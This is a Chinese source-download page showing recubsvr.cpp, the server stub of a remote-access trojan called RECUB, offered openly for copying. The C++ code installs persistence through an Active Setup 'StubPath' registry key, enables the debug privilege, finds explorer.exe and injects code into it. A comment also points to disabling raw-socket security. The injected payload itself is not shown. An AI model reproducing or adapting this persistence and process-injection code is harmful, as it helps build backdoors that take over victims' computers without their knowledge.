recubsvr.cpp

来自「一个外国的木马哦,功能挺多的」· C++ 代码 · 共 131 行

CPP
131
字号 
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//																					 //		
//									RECUB											 //
//								  By Hirosh											 //	
//								www.hirosh.net										 //				
//								www.eos-india.net									 //	
//																					 //		
//Thanks for starch at http://mir-os.sourceforge.net For the idea,I started this by  //	
//porting his version in linux to win32,after some time i stoped porting bc i prefer //
//a small EXE heheh..,and thanks to NC source too..									 //		
//																					 //	
//				No CopyRights		- Feel Free to Cut & Paste	  				     // 	
//																					 //
//																					 //						
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include <Tlhelp32.h>
#include "Tiny.h"
#include "inject.h"
#define REGKEY "{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"

BOOL Is2kXP()
{
	OSVERSIONINFO osinfo;
	osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

	if (!GetVersionEx(&osinfo)) 	return FALSE;
	//chek XP or 2k,2003
	if((osinfo.dwPlatformId == 2)&&(osinfo.dwMajorVersion == 5) )
	return TRUE;
	else
	return FALSE;
}
void EnableDebugPriv( void )
{
	HANDLE hToken;
	LUID sedebugnameValue;
	TOKEN_PRIVILEGES tkp;

	if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
		return;


	if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
	{
		CloseHandle( hToken );
		return;
	}

	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = sedebugnameValue;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL );
	CloseHandle( hToken );
}
HANDLE GetExplorerProcessHandle( void )
{
	HANDLE hSnap;
	PROCESSENTRY32 ppe;
	HANDLE h;
	EnableDebugPriv();
	hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	ppe.dwSize = sizeof( PROCESSENTRY32 );
	Process32First( hSnap, &ppe );
	while ( 1 ) {
	CharUpperBuff(ppe.szExeFile,strlen(ppe.szExeFile));
	if ( lstrcmp( "EXPLORER.EXE", ppe.szExeFile )==0 ) {
//	if ( lstrcmp( "WINLOGON.EXE", ppe.szExeFile )==0 ) {	
	h = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ppe.th32ProcessID );
	if ( h != 0 ) {
	//MessageBox(0,ppe.szExeFile,"t",MB_OK);
	return h;
	}
	}
	if ( !Process32Next( hSnap, &ppe ) ) break;
	}
	CloseHandle( hSnap );
	return FALSE;
}
void SetupCSP()
{					
	HCRYPTPROV hProv = NULL;	
	BOOL bSuccess = CryptAcquireContext(&hProv, NULL,  MS_DEF_PROV, PROV_RSA_FULL, 0);
	if (!bSuccess)
	{
		bSuccess = CryptAcquireContext(&hProv, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET);
	}

	if (!bSuccess)
	{
		bSuccess = CryptAcquireContext(&hProv, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET|CRYPT_MACHINE_KEYSET);
	}
	CryptReleaseContext(hProv, 0);
	
return ;
}
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
SetupCSP();
char regkey[MAX_PATH];
char pathexe[MAX_PATH];
HKEY childkey = 0 ;
// Active setup startup
GetModuleFileName(NULL,pathexe,MAX_PATH);
wsprintf(regkey,"%s%s","Software\\Microsoft\\Active Setup\\Installed Components\\",REGKEY);
RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey);
RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR )regkey, &childkey );
RegSetValueEx (childkey, ( LPCTSTR )"StubPath" ,0, REG_SZ, ( const BYTE* ) ( LPCTSTR )pathexe,lstrlen(pathexe)) ;
RegCloseKey ( childkey);
//HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Afd\Parameters
//DisableRawSecurity==1
if(Is2kXP()){		
		HANDLE hIE=GetExplorerProcessHandle();
		InjectIntoExplorer( hIE );
		CloseHandle( hIE );
}
ExitProcess(0);
return 0;
}

recubsvr.cpp - 源码说明

本页面展示了「一个外国的木马哦,功能挺多的」中的 recubsvr.cpp 源码文件,采用 C++ 编程语言编写,共 131 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与木马相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?